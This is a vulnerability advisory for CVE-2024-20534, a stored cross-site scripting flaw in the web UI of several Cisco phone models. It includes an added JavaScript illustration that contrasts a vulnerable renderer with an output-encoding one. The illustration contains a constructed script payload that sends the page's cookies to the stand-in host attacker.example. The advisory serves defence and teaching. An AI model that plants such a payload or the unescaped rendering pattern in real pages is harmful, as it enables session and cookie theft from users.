CVE-2024-20534

CVSS 3.1 Score 4.8 of 10 (medium)

Details

Published Nov 6, 2024
CWE ID 79

Summary

CVE-2024-20534 is a stored cross-site scripting (XSS) vulnerability in the web UI of several Cisco phone models running Cisco Multiplatform Firmware: the Cisco Desk Phone 9800 Series, the IP Phone 6800, 7800, and 8800 Series, and the Video Phone 8875. It allows an authenticated, remote attacker to conduct a stored XSS attack against a user of the interface. The root cause is that the web UI does not properly validate user-supplied input, so an attacker can inject malicious code into certain pages of the interface; the injected code is persisted by the device and later served to other users of the same interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information. Two preconditions limit the impact, which is why the CVSS score is only medium: the attacker must already hold Admin credentials on the device, and Web Access must be enabled on the phone. Web Access is disabled by default, so a practitioner can remove the attack surface entirely by confirming that it remains disabled on phones that do not need it, and by applying Cisco's fixed firmware where it is required.
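To make the vulnerability class concrete, the following is an added illustration of the stored-XSS pattern described in the summary. It is not Cisco firmware code and does not reproduce the affected pages; it is a constructed model of a management page that persists an admin-supplied setting and later renders it for another user. The field name, the payload, the domain attacker.example and the helper names are all assumptions made for the example.

```javascript
// Added illustration (not Cisco's code): a constructed settings store and two
// renderers, one vulnerable to stored XSS and one that output-encodes.

// Minimal HTML entity escaping for text placed into element content or a
// double-quoted attribute value. Not a substitute for a real templating
// engine, but sufficient for these two contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Constructed "device configuration store". A value submitted by an
// authenticated admin through the web UI is persisted here and rendered
// later; that persistence is what makes the XSS "stored" rather than
// reflected in a single request.
const configStore = new Map();

function saveSetting(name, value) {
  configStore.set(name, value);
}

// Vulnerable renderer: trusts the stored value and concatenates it into the
// page unchanged, so any markup inside the value becomes part of the DOM
// of every user who views the page.
function renderVulnerable(name) {
  const value = configStore.get(name) || "";
  return `<tr><td>${name}</td><td>${value}</td></tr>`;
}

// Hardened renderer: encodes the value at the point where it enters the
// HTML context, independent of whatever input validation ran on submit.
function renderSafe(name) {
  const value = configStore.get(name) || "";
  return `<tr><td>${escapeHtml(name)}</td><td>${escapeHtml(value)}</td></tr>`;
}

// Crude check used only for this demonstration: does the rendered fragment
// still contain a live <script> tag? A real review would parse the DOM.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload of the kind an admin-level attacker could submit;
// attacker.example is a reserved example domain, not a real endpoint.
const payload =
  '<script>location="https://attacker.example/?c="+document.cookie</script>';
saveSetting("Display Name", payload);

module.exports = { escapeHtml, saveSetting, renderVulnerable, renderSafe, containsScriptTag };
```

Running both renderers on the same stored value shows the difference: the vulnerable output contains an executable `<script>` element, while the hardened output renders the payload as visible text. The fix that matters is output encoding at the HTML sink; input validation alone, which the summary identifies as the failing control, is easy to bypass and does not protect other pages that read the same stored value.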

Affected Products

  • Video Phone 8875

Affected Vendors

  • Cisco Systems Inc